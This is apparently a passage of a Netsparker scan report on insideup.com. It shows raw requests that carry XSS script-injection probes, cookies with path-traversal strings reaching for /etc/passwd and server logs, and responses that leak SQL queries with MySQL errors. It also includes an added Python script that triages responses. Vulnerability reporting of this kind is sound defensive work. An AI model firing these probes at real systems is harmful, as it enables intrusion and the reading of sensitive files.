P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=r9728avvj5s5sa04j4cfhpvk81; path=/
Content-Length: 3313
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = 
prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc'"--></style></script><script>netsparker(0x000605)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000605)</script>/' union select prj.catI' at line 5
- /updateCity.html

/updateCity.html CONFIRMED

http://www.insideup.com/updateCity.html?city='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..

Parameters

Parameter Type Value
city GET '"--></style></script><script>alert(0x0009B3)</script>

Request

GET /updateCity.html?city='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009B3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/cityLinks.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:46 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=25F8AD3D3259B1CFC30B34CBA0DC2BE9; Path=/
Content-Length: 65
Connection: close
Content-Type: text/html; charset=UTF-8


'"--></style></script><script>netsparker(0x0009B3)</script>/null/
- /ppc/leadflow/cace00/project.php

/ppc/leadflow/cace00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='%3E%3Cscript..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET iupsc
nsextt GET '><script>alert(9)</script>

Request

GET /ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:46 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ape7q7qe031rd5o4jstgv6kjk7; path=/
Content-Length: 3113
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on 
grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/project.php?catId=80007&iusrc=iupsc&nsextt='><script>netsparker(9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '><script>netsparker(9)</script>' OR prj.project_page_url = 'leadflow/cace00/proj' at line 5
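The responses above carry two distinct signals that are worth separating when triaging a scan like this one. /updateCity.html returns the city value byte-for-byte in a text/html body, which is the reflected XSS (CWE-79) the report claims. project.php additionally prints the whole SQL statement followed by MySQL's syntax-error banner, which means the same input also reaches the database unescaped (CWE-89), so the "Cross-site Scripting" label alone undersells that finding. The Python below is an added example, not part of the Netsparker report or of the insideup.com application: it classifies a raw response against the probe that was sent, flags the reflection only when the body is served as HTML, and flags the DBMS error banner separately. The sample responses are constructed from the response bodies shown above with headers abridged; the "fixed" response is an assumption of what an HTML-escaping handler would return.

```python
"""Triage of raw HTTP responses for reflected-XSS and error-based SQLi evidence.

Added example around the scan output above; not part of the Netsparker report
or of the insideup.com application. The sample responses are constructed from
the report's own response bodies with headers abridged.
"""
import html
import re
from typing import NamedTuple, Tuple

# The probe as it appears URL-decoded in the report's requests.
PROBE = "'\"--></style></script><script>netsparker(0x0009B3)</script>"

# MySQL's syntax-error banner, printed verbatim into the project.php pages.
MYSQL_ERROR_RE = re.compile(
    r"You have an error in your SQL syntax; check the manual that corresponds "
    r"to your MySQL server version", re.I)
HTML_CT_RE = re.compile(r"^content-type:\s*text/html", re.I | re.M)


class Verdict(NamedTuple):
    reflected_raw: bool      # probe reflected byte-for-byte into an HTML body
    reflected_escaped: bool  # probe reflected only in HTML-escaped form
    sql_error: bool          # a DBMS error banner accompanies the reflection


def split_response(raw: str) -> Tuple[str, str]:
    """Split a raw HTTP response into (headers, body) at the first blank line."""
    head, _, body = raw.partition("\n\n")
    return head, body


def triage(raw_response: str, probe: str = PROBE) -> Verdict:
    """Classify one response against the probe that was sent.

    reflected_raw is only set for text/html responses: the same bytes in a
    text/plain or JSON body do not execute in a browser."""
    headers, body = split_response(raw_response)
    is_html = HTML_CT_RE.search(headers) is not None
    raw = is_html and probe in body
    escaped = (not raw) and html.escape(probe, quote=True) in body
    return Verdict(reflected_raw=raw, reflected_escaped=escaped,
                   sql_error=MYSQL_ERROR_RE.search(body) is not None)


# Constructed sample 1: the /updateCity.html response, which echoes the city
# parameter unchanged and appends "/null/".
UPDATECITY_RESPONSE = (
    "HTTP/1.1 200 OK\n"
    "Server: Apache/2.2.9 (Fedora)\n"
    "Content-Type: text/html; charset=UTF-8\n"
    "\n"
    "'\"--></style></script><script>netsparker(0x0009B3)</script>/null/\n")

# Constructed sample 2: the shape of the project.php responses, where the
# SQL statement and MySQL's error banner are printed into the page (shortened).
PROJECT_RESPONSE = (
    "HTTP/1.1 200 OK\n"
    "X-Powered-By: PHP/5.2.6\n"
    "Content-Type: text/html; charset=UTF-8\n"
    "\n"
    "select prj.catId from lead_flow_one_pages_details prj where "
    "prj.project_page_url = 'leadflow/cace00/project.php?catId='\"--></style>"
    "</script><script>netsparker(0x0009B3)</script>&iusrc=iupsc' "
    "You have an error in your SQL syntax; check the manual that corresponds "
    "to your MySQL server version for the right syntax to use near '...' at line 5\n")

# Constructed sample 3 (assumption): what /updateCity.html would return once the
# handler HTML-escapes the value before writing it into the page.
FIXED_RESPONSE = (
    "HTTP/1.1 200 OK\n"
    "Content-Type: text/html; charset=UTF-8\n"
    "\n" + html.escape(PROBE, quote=True) + "/null/\n")


if __name__ == "__main__":
    for name, resp in (("updateCity", UPDATECITY_RESPONSE),
                       ("project.php", PROJECT_RESPONSE),
                       ("fixed", FIXED_RESPONSE)):
        print(name, triage(resp))
```

The Content-Type check matters in practice: a scanner marks a reflection "confirmed" because its marker came back, but the same bytes in a JSON or text/plain body are not an executable context, so the verdict keys the raw-reflection flag on the header rather than on the body alone.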
- /ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0009C4)%3C/script%3E

/ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0009C4)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 80007
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0009C4)</script>

Request

GET /ppc/leadflow/cace00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0009C4)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
